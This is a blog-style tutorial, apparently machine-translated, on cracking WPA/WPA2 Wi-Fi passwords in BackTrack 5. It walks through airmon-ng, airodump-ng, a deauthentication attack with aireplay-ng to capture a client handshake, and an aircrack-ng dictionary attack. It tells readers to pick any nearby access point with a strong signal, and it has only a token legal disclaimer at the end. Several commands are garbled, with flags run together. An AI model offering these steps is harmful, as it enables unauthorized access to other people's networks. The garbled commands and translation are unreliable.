Yesterday, we published the minidwep-GTK method in the backtrack5 (BT5) wireless weppassword cracking tutorial, and introduced the simple method for cracking wep wireless password in BT5, today, I am going to show my friends how to crack WPA wpa2 wireless password in BT5.
Prerequisites: You have installed or guided the BT5 gnome32-bit image on your hard disk. You can refer to the following articles: backtrack5 hard disk boot + BT5 hard disk installation tutorial.
Although it is said that WPA password is hard to crack, in fact, well, it is true that it depends not only on technology, but also on luck. A powerful dictionary is needed here, there is a good dictionary, and it is often difficult to crack the password. Okay, don't sell off the customs. Let's say the method:
1. Open the wicd Network Manager of BT5 and go to the Internet under the application. Select an AP with a better number (which is nice to use ). Then look at its properties, open properties, and continue to open the properties inside to see the MAC address and channel of this AP.
2. ifconfig check the name of your wireless network card, which is usually wlan0 or wifi0. Then, run the command based on the actual situation.
3. enable wireless monitoring
Airmon-ng start wlan0 6
Note: wlan0 is the name of your wireless device 6 is the channel you want to open (but here 6 is actually not that important)
In this step, you may see a prompt indicating that the xxxx process is affected. It doesn't matter. Kill xxx As the process number given, and then run the preceding statement again until no error is reported.
4. As we have already selected the target, we will go straight to the target AP and start monitoring it with BT5.
airodump-ng -w nenew -c 4 --bssid AP‘s MAC mon0
At this time, you should be able to see the following:
5. Based on the above information, we can find the MAC addresses of the four clientclients and select one from them (preferably an active one ). Open a new terminal. Do not close the last terminal and you will need to use it later. Enter:
Aireplay-ng-0 10-a ap's Mac-c cp's Mac mon0
Run the command to check whether the WAP handshake icon is displayed on the first terminal. If it appears, congratulations, you are not far from success. If the command does not appear, continue to repeat the 5 command until the handshake occurs.
6. Crack the packets captured by the BT5 handshake
Aircrack-ng-W password.txt-B AP's Mac nenew. Cap
When password.txt is a dictionary file that we need to preset, there are a lot of dictionary files on the internet, search will have it. The cows will also release their dictionary files for download and continue to pay attention to them. Final result Diagram
This article is only for technical discussion and should not be used for illegal purposes. Otherwise, the consequences will be borne by you.